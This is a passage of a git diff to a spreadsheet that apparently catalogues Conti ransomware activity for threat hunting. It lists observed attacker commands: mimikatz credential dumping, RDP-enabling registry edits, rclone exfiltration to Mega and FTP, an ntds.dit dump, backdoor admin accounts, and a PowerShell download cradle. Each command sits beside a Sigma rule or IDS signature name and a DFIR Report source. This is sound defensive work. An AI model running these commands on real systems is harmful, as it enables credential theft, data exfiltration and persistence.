--- a/delta2/lib_e/osi_ransom/conti_ryuk.xlsx
+++ b/delta2/lib_e/osi_ransom/conti_ryuk.xlsx
@@ -1,21 +1,21 @@
 
 <file path=xl/workbook.xml><?xml version="1.0" encoding="utf-8"?>
 <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" mc:Ignorable="x15 xr xr6 xr10 xr2">
-  <fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="10402"/>
+  <fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="10413"/>
   <workbookPr defaultThemeVersion="202300"/>
   <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
     <mc:Choice Requires="x15">
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/h2w-delta/delta2/lib_e/osi_ransom/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{A4CA3B87-DA7F-8D40-8C86-AE4C73AC4407}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{A923BA4B-79BF-9B46-8682-8A29E99D46B5}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
     <workbookView xWindow="120" yWindow="-21100" windowWidth="38280" windowHeight="21100" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
   </bookViews>
   <sheets>
     <sheet name="sheet1" sheetId="1" r:id="rId1"/>
   </sheets>
-  <calcPr calcId="181029"/>
+  <calcPr calcId="191029"/>
   <extLst>
     <ext xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}">
       <x15:workbookPr chartTrackingRefBase="1"/>
@@ -36,7 +36,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="464" uniqueCount="303">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1405" uniqueCount="646">
   <si>
     <t>eid</t>
   </si>
@@ -143,9 +143,6 @@
     <t>conti-eid0014</t>
   </si>
   <si>
-    <t>"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f &amp;&amp; reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f</t>
-  </si>
-  <si>
     <t>conti-eid0015</t>
   </si>
   <si>
@@ -165,9 +162,6 @@
   </si>
   <si>
     <t>conti-eid0018</t>
-  </si>
-  <si>
-    <t>netsh firewall set service type =remotedesktop mode = enable</t>
   </si>
   <si>
     <t>conti-eid0019</t>
@@ -664,16 +658,6 @@
     <t>conti-eid0093</t>
   </si>
   <si>
-    <t>privilege::debug – checking privileges
-log nameoflog.log – enable log
-sekurlsa::logonpasswords – show all stored local passwords in plaintext
-log
-privilege::debug
-sekurlsa::logonpasswords
-token::elevate
-lsadump::sam</t>
-  </si>
-  <si>
     <t>mimikatz commands</t>
   </si>
   <si>
@@ -990,47 +974,1121 @@
 DisableAntiSpyware -Value 1 -PropertyType DWORD - Force</t>
   </si>
   <si>
-    <t>netclt-pid0022</t>
-  </si>
-  <si>
-    <t>netclt-pid0009</t>
-  </si>
-  <si>
-    <t>netclt-pid0025</t>
-  </si>
-  <si>
-    <t>netclt-pid0001</t>
-  </si>
-  <si>
-    <t>netclt-pid0002</t>
-  </si>
-  <si>
-    <t>comsvcs-pid0001, rundll-pid0001</t>
-  </si>
-  <si>
-    <t>rclone-pid0004</t>
-  </si>
-  <si>
     <t>rclone.exe copy "\PETERLENOVO.wist.local\Users" ftp1:uploads/Users/ -q --ignore-existing  --auto-confirm --multi-thread-streams 3 --transfers 3</t>
   </si>
   <si>
     <t>rclone.exe copy "\envisionpharma.com\IT\KLSHARE" Mega:Finanse -q --ignore-existing  --auto-confirm --multi-thread-streams 12 --transfers 12</t>
   </si>
   <si>
-    <t>rclone-pid0006</t>
-  </si>
-  <si>
-    <t xml:space="preserve">comsvcs-pid0001 </t>
-  </si>
-  <si>
     <t>cmdline</t>
+  </si>
+  <si>
+    <t>netsh firewall set service type =remotedesktop mode=enable</t>
+  </si>
+  <si>
+    <t>script</t>
+  </si>
+  <si>
+    <t xml:space="preserve">not a valid command </t>
+  </si>
+  <si>
+    <t>generic</t>
+  </si>
+  <si>
+    <t>htool</t>
+  </si>
+  <si>
+    <t xml:space="preserve">privilege::debug
+</t>
+  </si>
+  <si>
+    <t>lsadump::sam</t>
+  </si>
+  <si>
+    <t>token::elevate</t>
+  </si>
+  <si>
+    <t>conti-eid0142</t>
+  </si>
+  <si>
+    <t>conti-eid0143</t>
+  </si>
+  <si>
+    <t>conti-eid0144</t>
+  </si>
+  <si>
+    <t xml:space="preserve">Use of Cobalt Strike EXECUTE-ASSEMBLY to execute .net in memory </t>
+  </si>
+  <si>
+    <t>conti-eid0145</t>
+  </si>
+  <si>
+    <t>wmic-pid, vss-pid</t>
+  </si>
+  <si>
+    <t>wmic-pid, cmd-pid, ntds-pid</t>
+  </si>
+  <si>
+    <t>wmic-pid, cmd-pid,  ntds-pid</t>
+  </si>
+  <si>
+    <t>comsvcs-pid, rundll-pid, wmic-pid</t>
+  </si>
+  <si>
+    <t>wmic-pid</t>
+  </si>
+  <si>
+    <t>comsvcs-pid, rundll-pid</t>
+  </si>
+  <si>
+    <t>adfind-pid</t>
+  </si>
+  <si>
+    <t>comsvcs-pid</t>
+  </si>
+  <si>
+    <t>mimikatz-pid</t>
+  </si>
+  <si>
+    <t>netclt-pid</t>
+  </si>
+  <si>
+    <t>netscan-pid</t>
+  </si>
+  <si>
+    <t>netsh-pid</t>
+  </si>
+  <si>
+    <t>pshell-pid, anydesk-pid, netclt-pid</t>
+  </si>
+  <si>
+    <t>pshell-pid</t>
+  </si>
+  <si>
+    <t>rclone-pid</t>
+  </si>
+  <si>
+    <t>lsass-pid</t>
+  </si>
+  <si>
+    <t>procdump-pid</t>
+  </si>
+  <si>
+    <t>ntds-pid</t>
+  </si>
+  <si>
+    <t>nltest-pid</t>
+  </si>
+  <si>
+    <t>powerview-pid</t>
+  </si>
+  <si>
+    <t>smbabrute-pid</t>
+  </si>
+  <si>
+    <t>whoami-pid</t>
+  </si>
+  <si>
+    <t>registry-pid</t>
+  </si>
+  <si>
+    <t>conti-eid0146</t>
+  </si>
+  <si>
+    <t>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f &amp;&amp;</t>
+  </si>
+  <si>
+    <t>pnightmare-pid</t>
+  </si>
+  <si>
+    <t>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f</t>
+  </si>
+  <si>
+    <t>sharpview-pid, powerview-pid</t>
+  </si>
+  <si>
+    <t>rubeus-pid</t>
+  </si>
+  <si>
+    <t>psexec-pid</t>
+  </si>
+  <si>
+    <t>ngrok</t>
+  </si>
+  <si>
+    <t>{"date": "2022-04"url": "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", "tags": ["conti"]}</t>
+  </si>
+  <si>
+    <t>ipconfig /all</t>
+  </si>
+  <si>
+    <t>systeminfo</t>
+  </si>
+  <si>
+    <t>WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List</t>
+  </si>
+  <si>
+    <t>net config workstation</t>
+  </si>
+  <si>
+    <t>nltest /domain_trusts</t>
+  </si>
+  <si>
+    <t>net view /all</t>
+  </si>
+  <si>
+    <t>ipconfig-pid</t>
+  </si>
+  <si>
+    <t>cmd.exe /C nltest /dclist:</t>
+  </si>
+  <si>
+    <t>cmd.exe /C net group /domain "Domain Computers"</t>
+  </si>
+  <si>
+    <t>cmd.exe /C net group /domain "Enterprise Admins"</t>
+  </si>
+  <si>
+    <t>cmd.exe /c chcp &gt;&amp;2</t>
+  </si>
+  <si>
+    <t>adfind.exe -f "(objectcategory=person)"</t>
+  </si>
+  <si>
+    <t xml:space="preserve">adfind.exe -f "objectcategory=computer" </t>
+  </si>
+  <si>
+    <t xml:space="preserve">adfind.exe -f "(objectcategory=organizationalUnit)" </t>
+  </si>
+  <si>
+    <t>adfind.exe -gcb -sc trustdmp</t>
+  </si>
+  <si>
+    <t>adfind.exe -subnets -f (objectCategory=subnet)</t>
+  </si>
+  <si>
+    <t>adfind.exe  -sc trustdmp</t>
+  </si>
+  <si>
+    <t>cmd /c ping \\redacted\</t>
+  </si>
+  <si>
+    <t>conhost.exe 0xffffffff - ForceV1</t>
+  </si>
+  <si>
+    <t>C:\Windows\system32\cmd.exe /C dir “\\&lt;REDACTED&gt;\C$” /s &gt;&gt; listback.txt</t>
+  </si>
+  <si>
+    <t>C:\Windows\system32\cmd.exe /C dir “\\&lt;REDACTED&gt;\C$” /s &gt;&gt; list1.txt</t>
+  </si>
+  <si>
+    <t>file_path</t>
+  </si>
+  <si>
+    <t>object</t>
+  </si>
+  <si>
+    <t>pipeName: \MSSE-3328-server and Image: 61582ab.exe</t>
+  </si>
+  <si>
+    <t>named_pipe</t>
+  </si>
+  <si>
+    <t>pipeName: \MSSE-7344-server and Image: 044b7e1.exe</t>
+  </si>
+  <si>
+    <t>ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response
+ET MALWARE Cobalt Strike Beacon Activity (GET)
+ETPRO POLICY Observed Atera Remote Access Application Activity Domain in TLS SNI
+ET POLICY Command Shell Activity Over SMB - Possible Lateral Movement
+ET POLICY SMB Executable File Transfer
+ET POLICY SMB2 NT Create AndX Request For an Executable File
+ET HUNTING Possible Powershell .ps1 Script Use Over SMB
+ET POLICY SMB2 NT Create AndX Request For a Powershell .ps1 File</t>
+  </si>
+  <si>
+    <t>etpro</t>
+  </si>
+  <si>
+    <t>Atera Agent</t>
+  </si>
+  <si>
+    <t>Splashtop</t>
+  </si>
+  <si>
+    <t>Cobalt Strike</t>
+  </si>
+  <si>
+    <t>c2</t>
+  </si>
+  <si>
+    <t>AteraAgent.exe</t>
+  </si>
+  <si>
+    <t>file_name</t>
+  </si>
+  <si>
+    <t>SplashtopStreamer3360.exe</t>
+  </si>
+  <si>
+    <t>dllhost.exe accessed lsass memory</t>
+  </si>
+  <si>
+    <t>rundll32.exe \\host\c$\ProgramData\c64.dll, StartA</t>
+  </si>
+  <si>
+    <t>c:\windows\system32\msiexec.exe /I C:\programdata\sql.msi</t>
+  </si>
+  <si>
+    <t>conti-eid0147</t>
+  </si>
+  <si>
+    <t>conti-eid0148</t>
+  </si>
+  <si>
+    <t>conti-eid0149</t>
+  </si>
+  <si>
+    <t>conti-eid0150</t>
+  </si>
+  <si>
+    <t>conti-eid0151</t>
+  </si>
+  <si>
+    <t>conti-eid0152</t>
+  </si>
+  <si>
+    <t>conti-eid0153</t>
+  </si>
+  <si>
+    <t>conti-eid0154</t>
+  </si>
+  <si>
+    <t>conti-eid0155</t>
+  </si>
+  <si>
+    <t>conti-eid0156</t>
+  </si>
+  <si>
+    <t>conti-eid0157</t>
+  </si>
+  <si>
+    <t>conti-eid0158</t>
+  </si>
+  <si>
+    <t>conti-eid0159</t>
+  </si>
+  <si>
+    <t>conti-eid0160</t>
+  </si>
+  <si>
+    <t>conti-eid0161</t>
+  </si>
+  <si>
+    <t>conti-eid0162</t>
+  </si>
+  <si>
+    <t>conti-eid0163</t>
+  </si>
+  <si>
+    <t>conti-eid0164</t>
+  </si>
+  <si>
+    <t>conti-eid0165</t>
+  </si>
+  <si>
+    <t>conti-eid0166</t>
+  </si>
+  <si>
+    <t>conti-eid0167</t>
+  </si>
+  <si>
+    <t>conti-eid0168</t>
+  </si>
+  <si>
+    <t>conti-eid0169</t>
+  </si>
+  <si>
+    <t>conti-eid0170</t>
+  </si>
+  <si>
+    <t>conti-eid0171</t>
+  </si>
+  <si>
+    <t>conti-eid0172</t>
+  </si>
+  <si>
+    <t>conti-eid0173</t>
+  </si>
+  <si>
+    <t>conti-eid0174</t>
+  </si>
+  <si>
+    <t>conti-eid0175</t>
+  </si>
+  <si>
+    <t>conti-eid0176</t>
+  </si>
+  <si>
+    <t>conti-eid0177</t>
+  </si>
+  <si>
+    <t>conti-eid0178</t>
+  </si>
+  <si>
+    <t>conti-eid0179</t>
+  </si>
+  <si>
+    <t>conti-eid0180</t>
+  </si>
+  <si>
+    <t>conti-eid0181</t>
+  </si>
+  <si>
+    <t>conti-eid0182</t>
+  </si>
+  <si>
+    <t>conti-eid0183</t>
+  </si>
+  <si>
+    <t>conti-eid0184</t>
+  </si>
+  <si>
+    <t>cmd /c dir "\\host\c$" /s&gt;&gt; listback.txt</t>
+  </si>
+  <si>
+    <t>regsvr32.exe /s /n /i:"-m -net -size 10 -nomutex -p \\host\C$" x64.dll</t>
+  </si>
+  <si>
+    <t>conti-eid0185</t>
+  </si>
+  <si>
+    <t>regsvr32.exe /s c:\users\&lt;uname&gt;\AppData\Local\Temp\Ewge.dll</t>
+  </si>
+  <si>
+    <t>C:\Users\&lt;uname&gt;\AppData\LocalTemp\Faicury4.exe</t>
+  </si>
+  <si>
+    <t>conti-eid0186</t>
+  </si>
+  <si>
+    <t>conti-eid0187</t>
+  </si>
+  <si>
+    <t>regsvr-pid</t>
+  </si>
+  <si>
+    <t>{"object": "process_create", "initiating_process_command_line": "msiexec.exe /V", "process_command_line": r''' "AleterAgent.exe" /i /IntegratorLogin="" /CompanyId="" /IntegratorLoginUI="" /CompanyIdUI="" '''}</t>
+  </si>
+  <si>
+    <t>{"object": "process_create", "initiating_process_command_line": "msiexec.exe /V", "process_command_line": r''' "AleterAgent.exe" /i /IntegratorLogin="" /CompanyId="" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="" '''}</t>
+  </si>
+  <si>
+    <t>{"object": "process_create", "initiating_process_command_line": "msiexec.exe /V", "process_command_line": r''' "AleterAgent.exe" /u '''}</t>
+  </si>
+  <si>
+    <t>conti-eid0188</t>
+  </si>
+  <si>
+    <t>conti-eid0189</t>
+  </si>
+  <si>
+    <t>conti-eid0190</t>
+  </si>
+  <si>
+    <t>powershell -nop -exec bypass -EncodedCommand</t>
+  </si>
+  <si>
+    <t>conti-eid0191</t>
+  </si>
+  <si>
+    <t>{"object": "open_process_api_call", "process_command_line": "lsass.exe", "initiating_process_command_line": r''' "taskmgr.exe" /4 ''', "desired_access": "5136"}</t>
+  </si>
+  <si>
+    <t>{"object": "open_process_api_call", "process_command_line": "lsass.exe", "initiating_process_command_line": r''' rundll32.exe \\host\c$\ProgramData\c64.dll, StartA''', "desired_access": "64"}</t>
+  </si>
+  <si>
+    <t>{"object": "open_process_api_call", "process_command_line": "lsass.exe", "initiating_process_command_line": r''' dllhost.exe''', "desired_access": "4112"}</t>
+  </si>
+  <si>
+    <t>{"object": "open_process_api_call", "process_command_line": "lsass.exe", "initiating_process_command_line": r''' taskmgr''', "desired_access": "5136"}</t>
+  </si>
+  <si>
+    <t>{"object": "open_process_api_call", "process_command_line": "lsass.exe", "initiating_process_command_line": r''' regsvr32.exe /s "c:\Users\uname\AppData\Local\Temp\Edebef4.dll''', "desired_access": "64"}</t>
+  </si>
+  <si>
+    <t>conti-eid0192</t>
+  </si>
+  <si>
+    <t>conti-eid0193</t>
+  </si>
+  <si>
+    <t>conti-eid0194</t>
+  </si>
+  <si>
+    <t>conti-eid0195</t>
+  </si>
+  <si>
+    <t>conti-eid0196</t>
+  </si>
+  <si>
+    <t>Desired Access = 5136 Hex Value 1410 PROCESS_VM_READ (0x0010) PROCESS_QUERY_INFORMATION (0x0400) PROCESS_QUERY_LIMITED_INFORMATION (0x1000)*</t>
+  </si>
+  <si>
+    <t>Desired Access = 4112 Hex Value 1010 PROCESS_VM_READ (0x0010) PROCESS_QUERY_LIMITED_INFORMATION (0x1000)</t>
+  </si>
+  <si>
+    <t>Desired Access = 64 Hex Value 40 PROCESS_DUP_HANDLE (0x0040)</t>
+  </si>
+  <si>
+    <t>conti-eid0197</t>
+  </si>
+  <si>
+    <t>conti-eid0198</t>
+  </si>
+  <si>
+    <t>conti-eid0199</t>
+  </si>
+  <si>
+    <t>{"object": "process_create", "initiating_process_command_line": "cmd.exe /c backup.bat", "process_command_line": "conhost.exe 0xffffffff -ForceV1"}</t>
+  </si>
+  <si>
+    <t>conti-eid0200</t>
+  </si>
+  <si>
+    <t>sigma</t>
+  </si>
+  <si>
+    <t>LSASS Memory Dump : 5ef9853e-4d0e-4a70-846f-a9ca37d876da</t>
+  </si>
+  <si>
+    <t>Malicious PowerView PowerShell Commandlets : dcd74b95-3f36-4ed9-9598-0490951643aa</t>
+  </si>
+  <si>
+    <t>AdFind Usage Detection : 9a132afa-654e-11eb-ae93-0242ac130002</t>
+  </si>
+  <si>
+    <t>Powershell Defender Disable Scan Feature : 1ec65a5f-9473-4f12-97da-622044d6df21</t>
+  </si>
+  <si>
+    <t>url</t>
+  </si>
+  <si>
+    <t>Access to ADMIN$ Share : 098d7118-55bc-4912-a836-dc6483a8d150</t>
+  </si>
+  <si>
+    <t>Atera Agent Installation : 87261fb2-69d0-42fe-b9de-88c6b5f65a43</t>
+  </si>
+  <si>
+    <t>Domain Trust Discovery : 3bad990e-4848-4a78-9530-b427d854aac0</t>
+  </si>
+  <si>
+    <t>Suspicious Reconnaissance Activity : d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
+  </si>
+  <si>
+    <t>CobaltStrike Service Installations : d7a95147-145f-4678-b85d-d1ff4a3bb3f6</t>
+  </si>
+  <si>
+    <t>{"object": "service_install", "file_name": \\host\ADMIN$\044b7e1.exe"}</t>
+  </si>
+  <si>
+    <t>conti-eid0201</t>
+  </si>
+  <si>
+    <t>conti-eid0202</t>
+  </si>
+  <si>
+    <t>conti-eid0203</t>
+  </si>
+  <si>
+    <t>conti-eid0204</t>
+  </si>
+  <si>
+    <t>conti-eid0205</t>
+  </si>
+  <si>
+    <t>conti-eid0206</t>
+  </si>
+  <si>
+    <t>conti-eid0207</t>
+  </si>
+  <si>
+    <t>conti-eid0208</t>
+  </si>
+  <si>
+    <t>conti-eid0209</t>
+  </si>
+  <si>
+    <t>{"date": "2021-09"url": "https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/", "tags": ["conti"]}</t>
+  </si>
+  <si>
+    <t>C:\Windows\system32\svchost.exe -k UnistackSvcGroup</t>
+  </si>
+  <si>
+    <t>taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}</t>
+  </si>
+  <si>
+    <t>beacon</t>
+  </si>
+  <si>
+    <t>C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService</t>
+  </si>
+  <si>
+    <t>rundll32.exe C:\Users\USER\AppData\Local\Temp\7A86.dll,DllRegisterServer</t>
+  </si>
+  <si>
+    <t>C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc</t>
+  </si>
+  <si>
+    <t>net localgroup "administrator"</t>
+  </si>
+  <si>
+    <t>net group "domain admins" /dom</t>
+  </si>
+  <si>
+    <t>C:\Windows\system32\net1 group "domain admins" /dom</t>
+  </si>
+  <si>
+    <t>C:\Windows\system32\cmd.exe /C systeminfo</t>
+  </si>
+  <si>
+    <t>C:\Windows\system32\cmd.exe /C ping DOMAINCONTROLLER</t>
+  </si>
+  <si>
+    <t>C:\Windows\system32\cmd.exe /C ping ENDPOINT</t>
+  </si>
+  <si>
+    <t>C:\Windows\system32\cmd.exe /C net localgroup Administrators</t>
+  </si>
+  <si>
+    <t>C:\Windows\System32\Taskmgr.exe</t>
+  </si>
+  <si>
+    <t>C:\Windows\system32\cmd.exe /C time</t>
+  </si>
+  <si>
+    <t>{"object": "net", "initiating_process_command_line": "svchost.exe -k UnistackSvcGroup -s WpnUserService", "remote_port": "445"}</t>
+  </si>
+  <si>
+    <t>svchost injected with beacon scan smb</t>
+  </si>
+  <si>
+    <t xml:space="preserve">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -exec bypass -EncodedCommand </t>
+  </si>
+  <si>
+    <t>IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:33242/'); Get-WmiObject -Class win32_logicalDisk -ComputerName SYSTEMNAME | Select-Object pscomputername, Name, @{n="Space";e={[math]::Round($_.Size/1GB,2)}}, @{n="FreeSpace";e={[math]::Round($_.FreeSpace/1GB,2)}}, @{n="BUSY";e={[math]::Round(($_.Size-$_.FreeSpace)/1GB,2)}}</t>
+  </si>
+  <si>
+    <t>powershell.exe -executionpolicy remotesigned -File .\Get-DataInfo.ps1 method</t>
+  </si>
+  <si>
+    <t>Get-ADComputer -Filter {enabled -eq $true} -properties *|select Name, DNSHostName, OperatingSystem, LastLogonDate | Export-CSV C:\Users\AllWindows.csv -NoTypeInformation -Encoding UTF8</t>
+  </si>
+  <si>
+    <t>C:\Windows\system32\cmd.exe /C wmic /node:"DOMAINCONTROLLER" process call create "C:\3.exe"</t>
+  </si>
+  <si>
+    <t>C:\Users\REDACTED\AppData\Local\Temp\1\is-HCFKT.tmp\WinSCP-5.19.1-Setup.tmp" /SL5="$A02B0,10288106,864256,C:\Users\USER\Desktop\WinSCP-5.19.1-Setup.exe"</t>
+  </si>
+  <si>
+    <t>C:\Windows\system32\cmd.exe /C wmic /node:"ENDPOINT" process call create "C:\test.exe"</t>
+  </si>
+  <si>
+    <t>ET MALWARE Observed Malicious SSL Cert (Bazar Backdoor)
+ET MALWARE Observed Malicious SSL Cert (Bazar CnC)
+ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2
+ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response
+ET POLICY TLS possible TOR SSL traffic
+ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 234
+ET HUNTING Possible Powershell .ps1 Script Use Over SMB
+ET POLICY Possible WMI .mof Managed Object File Use Over SMB
+ET POLICY SMB2 NT Create AndX Request For a .bat File
+ET POLICY SMB2 NT Create AndX Request For a DLL File - Possible Lateral Movement
+ET POLICY SMB2 NT Create AndX Request For an Executable File
+ET POLICY SMB2 NT Create AndX Request For a Powershell .ps1 File
+ET SCAN Behavioral Unusual Port 135 traffic Potential Scan or Infection</t>
+  </si>
+  <si>
+    <t>CobaltStrike Service Installations : 5a105d34-05fc-401e-8553-272b45c1522d</t>
+  </si>
+  <si>
+    <t>Suspicious Remote Thread Created : 66d31e5f-52d6-40a4-9615-002d3789a119</t>
+  </si>
+  <si>
+    <t>Quick Execution of a Series of Suspicious Commands : 61ab5496-748e-4818-a92f-de78e20fe7f1</t>
+  </si>
+  <si>
+    <t>Pass the Hash Activity 2 : 8eef149c-bd26-49f2-9e5a-9b00e3af499b</t>
+  </si>
+  <si>
+    <t>Suspicious WMI Execution : 526be59f-a573-4eea-b5f7-f0973207634d</t>
+  </si>
+  <si>
+    <t>Encoded IEX : 88f680b8-070e-402c-ae11-d2914f2257f1</t>
+  </si>
+  <si>
+    <t>Successful Overpass the Hash Attempt : 192a0330-c20b-4356-90b6-7b7049ae0b87</t>
+  </si>
+  <si>
+    <t>conti-eid0210</t>
+  </si>
+  <si>
+    <t>conti-eid0211</t>
+  </si>
+  <si>
+    <t>conti-eid0212</t>
+  </si>
+  <si>
+    <t>conti-eid0213</t>
+  </si>
+  <si>
+    <t>conti-eid0214</t>
+  </si>
+  <si>
+    <t>conti-eid0215</t>
+  </si>
+  <si>
+    <t>conti-eid0216</t>
+  </si>
+  <si>
+    <t>conti-eid0217</t>
+  </si>
+  <si>
+    <t>conti-eid0218</t>
+  </si>
+  <si>
+    <t>conti-eid0219</t>
+  </si>
+  <si>
+    <t>conti-eid0220</t>
+  </si>
+  <si>
+    <t>conti-eid0221</t>
+  </si>
+  <si>
+    <t>conti-eid0222</t>
+  </si>
+  <si>
+    <t>conti-eid0223</t>
+  </si>
+  <si>
+    <t>conti-eid0224</t>
+  </si>
+  <si>
+    <t>conti-eid0225</t>
+  </si>
+  <si>
+    <t>conti-eid0226</t>
+  </si>
+  <si>
+    <t>conti-eid0227</t>
+  </si>
+  <si>
+    <t>conti-eid0228</t>
+  </si>
+  <si>
+    <t>conti-eid0229</t>
+  </si>
+  <si>
+    <t>conti-eid0230</t>
+  </si>
+  <si>
+    <t>conti-eid0231</t>
+  </si>
+  <si>
+    <t>conti-eid0232</t>
+  </si>
+  <si>
+    <t>conti-eid0233</t>
+  </si>
+  <si>
+    <t>conti-eid0234</t>
+  </si>
+  <si>
+    <t>conti-eid0235</t>
+  </si>
+  <si>
+    <t>conti-eid0236</t>
+  </si>
+  <si>
+    <t>conti-eid0237</t>
+  </si>
+  <si>
+    <t>conti-eid0238</t>
+  </si>
+  <si>
+    <t>conti-eid0239</t>
+  </si>
+  <si>
+    <t>conti-eid0240</t>
+  </si>
+  <si>
+    <t>conti-eid0241</t>
+  </si>
+  <si>
+    <t>{"date": "2021-10": "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", "tags": ["conti"]}</t>
+  </si>
+  <si>
+    <t>AnyDesk</t>
+  </si>
+  <si>
+    <t>Advanced Ip Scanner</t>
+  </si>
+  <si>
+    <t>seatbelt</t>
+  </si>
+  <si>
+    <t xml:space="preserve">Cobalt Strike </t>
+  </si>
+  <si>
+    <t>Rclone</t>
+  </si>
+  <si>
+    <t>Mega</t>
+  </si>
+  <si>
+    <t>rundll32.exe C:\Users\USER\AppData\Local\Temp\randomstring.dll,#1</t>
+  </si>
+  <si>
+    <t>{"object": "process_create", "initiating_process_command_line": "svchost.exe -k UnistackSvcGroup", "process_command_line": "rundll32.exe C:\Users\USER\AppData\Local\Temp\randomstring.dll,EntryPoint"}</t>
+  </si>
+  <si>
+    <t>net user sqlbackup qc69t4b#z0ke3 /add</t>
+  </si>
+  <si>
+    <t>net user localadmin qc69t4b#z0ke3 /add</t>
+  </si>
+  <si>
+    <t>net localgroup administrators localadmin /add</t>
+  </si>
+  <si>
+    <t>{"object": "service_install", "file_name": c:\Program Files (x86)\AnyDesk\AnyDesk.exe --service"}</t>
+  </si>
+  <si>
+    <t>ntdsutil "ac in ntds" "ifm" "create full c:\windows\temp\crashpad\x" q q</t>
+  </si>
+  <si>
+    <t>ntdsAudit.exe ntds.dit -s SYSTEM -p pwddump.txt -u users.csv</t>
+  </si>
+  <si>
+    <t xml:space="preserve">net view /all  </t>
+  </si>
+  <si>
+    <t xml:space="preserve">net group "domain admins" /dom </t>
+  </si>
+  <si>
+    <t xml:space="preserve">nltest /dclist </t>
+  </si>
+  <si>
+    <t>net group "Domain Admins" /dom</t>
+  </si>
+  <si>
+    <t>tasklist</t>
+  </si>
+  <si>
+    <t>net  localgroup Administrateurs</t>
+  </si>
+  <si>
+    <t>net localgroup Administrators</t>
+  </si>
+  <si>
+    <t>SYSTEMINFO</t>
+  </si>
+  <si>
+    <t>{"object": "process_create", "process_command_line": "cmd.exe /c ipconfig", "initiating_process_command_line": "rundll32.exe c:\users\uname\appdata\local\temp\37b.dll, entrypoint"}</t>
+  </si>
+  <si>
+    <t>{"object": "process_create", "process_command_line": "cmd.exe /c ipconfig /all", "initiating_process_command_line": "rundll32.exe c:\users\uname\appdata\local\temp\37b.dll, entrypoint"}</t>
+  </si>
+  <si>
+    <t>{"object": "process_create", "process_command_line": "cmd.exe /c ping", "initiating_process_command_line": "rundll32.exe c:\users\uname\appdata\local\temp\37b.dll, entrypoint"}</t>
+  </si>
+  <si>
+    <t>{"object": "process_create", "process_command_line": "cmd.exe /c nltest /dclist", "initiating_process_command_line": "rundll32.exe c:\users\uname\appdata\local\temp\37b.dll, entrypoint"}</t>
+  </si>
+  <si>
+    <t>{"object": "process_create", "process_command_line": "cmd.exe /c net group "Domain Admins" /dom", "initiating_process_command_line": "rundll32.exe c:\users\uname\appdata\local\temp\37b.dll, entrypoint"}</t>
+  </si>
+  <si>
+    <t>{"object": "process_create", "process_command_line": "cmd.exe /c tasklist", "initiating_process_command_line": "rundll32.exe c:\users\uname\appdata\local\temp\37b.dll, entrypoint"}</t>
+  </si>
+  <si>
+    <t>{"object": "process_create", "process_command_line": "cmd.exe /c net localgroup administators", "initiating_process_command_line": "rundll32.exe c:\users\uname\appdata\local\temp\37b.dll, entrypoint"}</t>
+  </si>
+  <si>
+    <t>{"object": "process_create", "process_command_line": "cmd.exe /c systeminfo", "initiating_process_command_line": "rundll32.exe c:\users\uname\appdata\local\temp\37b.dll, entrypoint"}</t>
+  </si>
+  <si>
+    <t xml:space="preserve">adfind.exe -f "(objectcategory=person)" </t>
+  </si>
+  <si>
+    <t xml:space="preserve">adfind.exe -f "(objectcategory=organizationalunit)" </t>
+  </si>
+  <si>
+    <t xml:space="preserve">adfind.exe -sc trustdmp </t>
+  </si>
+  <si>
